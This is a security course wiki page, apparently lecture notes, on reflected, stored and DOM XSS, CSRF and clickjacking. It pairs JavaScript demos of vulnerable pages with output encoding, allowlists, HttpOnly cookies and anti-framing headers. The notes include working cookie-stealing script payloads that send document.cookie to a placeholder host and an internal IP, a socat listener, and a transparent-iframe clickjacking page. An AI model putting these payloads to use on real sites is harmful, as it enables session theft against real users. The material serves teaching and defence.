App Vulnerabilities: XSS, CSRF, and Clickjacking - Paiet/SEC-335 GitHub Wiki

  • Cross-site scripting (XSS)
    • Reflected
      • Reflected XSS exploits input that the server echoes straight back into the page it returns
      • Test bWAPP for XSS with a JavaScript alert() payload
      • Exploits
        • Browser Redirection & Cookie Stealing
          • Use JavaScript to steal session cookies
            1. Craft URL with reflected XSS
            2. <script>location.href='http://www.evilsite.com/bogus.php?cookie='+document.cookie;</script>
            3. Use social engineering to trick the user into clicking the link
            4. Check the listener for the connection (the cookie arrives in the request line)
            5. Use SOCAT as the listener (start it before sending the link)
            6. socat TCP-LISTEN:80,reuseaddr,fork -
    • Stored/persistent
      • Script gets stored in the DB or on the web server
        • Anywhere user input persists as a part of the page
          • Comments are great for this
            • Use SE to get the user to browse the site
              • Steal their cookies
                • <script>new Image().src="http://10.0.0.212/bogus.php?output="+document.cookie;</script>
                  • An Image request sends the cookie without redirecting the victim, so the theft is silent
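The reflecting page from both sides, as an added example that is not code from the wiki, bWAPP or DVWA: the same search page rendered the vulnerable way and with HTML output encoding, the stored (comment) variant, and the HttpOnly flag that keeps the session cookie out of document.cookie. The victim host, the search endpoint and the crafted URL are made up for the demo; the payload is the wiki's cookie-stealing one-liner with its evilsite.com placeholder kept.

```javascript
// Added example (not from the SEC-335 wiki, bWAPP or DVWA): a server-side
// "search" page that reflects user input, shown both as the vulnerable page
// renders it and with HTML output encoding, plus the Set-Cookie flag that keeps
// the session cookie out of document.cookie. Host names, the endpoint and the
// crafted URL are constructed for this demo.

// The wiki's cookie-stealing payload; www.evilsite.com is a placeholder.
const COOKIE_STEALER =
  "<script>location.href='http://www.evilsite.com/bogus.php?cookie='+document.cookie;</script>";

// What the attacker sends the victim (step 1 of the wiki's procedure): the
// payload URL-encoded into the reflected parameter of a made-up victim site.
function craftReflectedUrl(payload) {
  return 'http://victim.example/search?q=' + encodeURIComponent(payload);
}

// Server side: read the reflected parameter the way the page would.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) ?? '';
}

// Encode the five characters that let attacker data change HTML structure.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the parameter is concatenated straight into the page.
function renderSearchVulnerable(query) {
  return `<html><body><p>You searched for: ${query}</p></body></html>`;
}

// FIXED: the same page, parameter encoded for an HTML text context.
function renderSearchSafe(query) {
  return `<html><body><p>You searched for: ${htmlEscape(query)}</p></body></html>`;
}

// Stored XSS is the same bug with the comment table as the source instead of
// the URL: every stored comment goes through the encoder on its way out.
function renderComments(comments, escape = true) {
  return '<ul>' + comments.map((c) => `<li>${escape ? htmlEscape(c) : c}</li>`).join('') + '</ul>';
}

// Does the rendered page contain an executable <script> element?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Session cookie issued with HttpOnly: a script that does run cannot read it,
// so the bogus.php?cookie= request arrives without the session cookie in it.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Walk the attack once so the difference is visible when run directly.
const crafted = craftReflectedUrl(COOKIE_STEALER);
console.log('victim clicks :', crafted);
console.log('vulnerable    :', renderSearchVulnerable(queryParam(crafted, 'q')));
console.log('encoded       :', renderSearchSafe(queryParam(crafted, 'q')));
```

The encoder is context-specific: it is correct for text between tags and for quoted attribute values, not for a value dropped inside a script block or a URL, which need their own encoding.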

App Vulnerabilities: XSS, CSRF, and Clickjacking Pt.2

  • DOM
    • The target's browser does all the script rendering: client-side JavaScript reads the payload from the URL and writes it into the page
      • It isn't rendered by either the...
        • Database
        • Web Server
    • DEMO: DVWA
      1. Choose a language setting and submit
      2. In the address bar, add an XSS alert payload after the language value
      3. Get the alert pop-up
      4. Inspect the language element and see how the XSS payload has become a part of the language option (injected into the DOM)
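The DVWA demo as an added example, not DVWA's own code: the language option is assembled by script in the browser from the "default" query parameter, so the server only ever serves a static page and never renders the payload. The sink is modelled as a pure function so it can be run and tested outside a browser; the dvwa.local URL, the language list and the payload are constructed for the demo.

```javascript
// Added example (not DVWA's code): the DOM XSS sink modelled as a pure
// function. The browser reads "default" from the URL and builds the <option>
// markup itself; the vulnerable version writes the value unchanged, the fixed
// version only accepts a known language. The dvwa.local URL, the language
// list and the payload are constructed for this demo.

const LANGUAGES = ['English', 'French', 'Spanish', 'German'];
const DEFAULT_LANGUAGE = 'English';

// Client side: read the "default" parameter from the URL the browser is on.
// This runs after the page has loaded; no server-side filter sees it.
function requestedLanguage(pageUrl) {
  return new URL(pageUrl).searchParams.get('default') ?? DEFAULT_LANGUAGE;
}

// Shared markup builder: selected language first, then the others.
function optionMarkup(selected) {
  const order = [selected, ...LANGUAGES.filter((l) => l !== selected)];
  return order.map((l) => `<option value="${l}">${l}</option>`).join('');
}

// VULNERABLE sink: whatever was in the URL is written into the markup as-is
// (the document.write('<option>' + lang + '</option>') pattern).
function buildLanguageOptionsVulnerable(pageUrl) {
  return optionMarkup(requestedLanguage(pageUrl));
}

// FIXED sink: the value is only used if it names a known language; anything
// else falls back to the default, so no URL-controlled text reaches the DOM.
function buildLanguageOptionsSafe(pageUrl) {
  const lang = requestedLanguage(pageUrl);
  return optionMarkup(LANGUAGES.includes(lang) ? lang : DEFAULT_LANGUAGE);
}

// Inspect-element stand-in: which element names other than <option> ended up
// in the markup? Anything listed here was injected into the DOM from the URL.
function injectedElements(html) {
  const names = [...html.matchAll(/<\/?([a-z][a-z0-9]*)\b/gi)].map((m) => m[1].toLowerCase());
  return [...new Set(names.filter((n) => n !== 'option'))];
}

// Step 2 of the demo: the alert payload appended after the language in the address bar.
const DEMO_URL =
  'http://dvwa.local/vulnerabilities/xss_d/?default=' +
  encodeURIComponent('English<script>alert(document.cookie)</script>');

console.log('vulnerable injected :', injectedElements(buildLanguageOptionsVulnerable(DEMO_URL)));
console.log('fixed injected      :', injectedElements(buildLanguageOptionsSafe(DEMO_URL)));
```

An allowlist is the right fix when the set of legal values is small and fixed, as it is for a language picker; when free-form text has to be shown, the value must instead be inserted as text (textContent, or an HTML encoder) rather than as markup.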
  • HTML
    • Reflected
      • Vulnerable site takes user input
      • "Reflects" input back to user
    • Stored/Persistent
      • Injected code gets stored on vulnerable site's server
        • Typically as part of the web page
      • When users visit page with stored code
        • Code gets executed by user's browser
    • DEMO: DVWA and myHTTP-Login-Form-2.txt
  • Cross-site request forgery (CSRF/XSRF)
    • Exploits the trust relationship between a user's browser and a website
      • Unexpired session cookies make this exploit possible: the browser attaches them to any request to the site, including one an attacker's page triggers
        • Social Engineering attack
          • Get the user to click a malicious web link
            • If the user has a current valid session, the attack will complete
              • Difficult to pull off: the victim must be logged in at the moment they click, and the attacker never sees the response
  • Clickjacking
    • Hijacking a user's click events by loading the target site in an invisible frame over a decoy page
      • Get likes/subscribes/notifications
        • A way to artificially inflate site traffic and interest
          • DEMO: ClickJack.html and Mysite.html
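The overlay technique and the headers that defeat it, as an added example that is not the wiki's ClickJack.html or Mysite.html: a generator for the transparent-iframe attacker page, and a checker that decides from a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers whether a given origin may frame it. The mysite.example and evil.example origins and the header sets are constructed for the demo, and the CSP matcher handles exact origins, 'self', 'none' and '*' only.

```javascript
// Added example (not the wiki's ClickJack.html / Mysite.html): how the overlay
// in a clickjacking page is built, and a checker for the two response headers
// that stop a site from being framed. The origins, target URL and header sets
// are constructed for this demo; the CSP matcher only understands exact
// origins, 'self', 'none' and '*' (no wildcards or path matching).

// Attacker page: the target is loaded in a full-size, fully transparent iframe
// stacked above a decoy button, so the victim's click lands on the target's
// Like/Subscribe control instead of the button they can see.
function clickjackPage(targetUrl) {
  return `<html><body>
<div style="position:absolute;top:120px;left:80px;z-index:1">
  <button>Click to claim your prize</button>
</div>
<iframe src="${targetUrl}"
  style="position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;z-index:2"></iframe>
</body></html>`;
}

// Parse the frame-ancestors directive out of a Content-Security-Policy header.
// Returns the list of sources (quotes stripped, lowercased) or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  const directive = csp.split(';').map((d) => d.trim()).find((d) => /^frame-ancestors\b/i.test(d));
  if (!directive) return null;
  return directive.split(/\s+/).slice(1).map((s) => s.replace(/^'|'$/g, '').toLowerCase());
}

// Decide whether a browser will render a response with these headers inside a
// frame owned by framerOrigin (null = top-level, not framed at all). When both
// headers are present, frame-ancestors wins and X-Frame-Options is ignored.
function framingAllowed(responseHeaders, framerOrigin, ownOrigin) {
  if (framerOrigin === null) return true;
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = v;

  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors) {
    if (ancestors.includes('none')) return false;
    if (ancestors.includes('*')) return true;
    if (ancestors.includes('self') && framerOrigin === ownOrigin) return true;
    return ancestors.includes(framerOrigin.toLowerCase());
  }

  // X-Frame-Options: DENY or SAMEORIGIN. The obsolete ALLOW-FROM is ignored by
  // current browsers, which then behave as if the header were absent.
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === ownOrigin;
  return true; // no protection at all: any site can frame this response
}

// Header set a site should send to stop the attack page above from working.
function antiFramingHeaders() {
  return { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" };
}

console.log(clickjackPage('https://mysite.example/like'));
console.log('evil.example may frame unprotected page:',
  framingAllowed({}, 'https://evil.example', 'https://mysite.example'));
console.log('evil.example may frame protected page  :',
  framingAllowed(antiFramingHeaders(), 'https://evil.example', 'https://mysite.example'));
```

Send both headers: frame-ancestors is the current standard, X-Frame-Options covers older browsers that do not evaluate CSP. A frame-busting script in the page is no substitute, since the framing page can neutralise it with the iframe sandbox attribute.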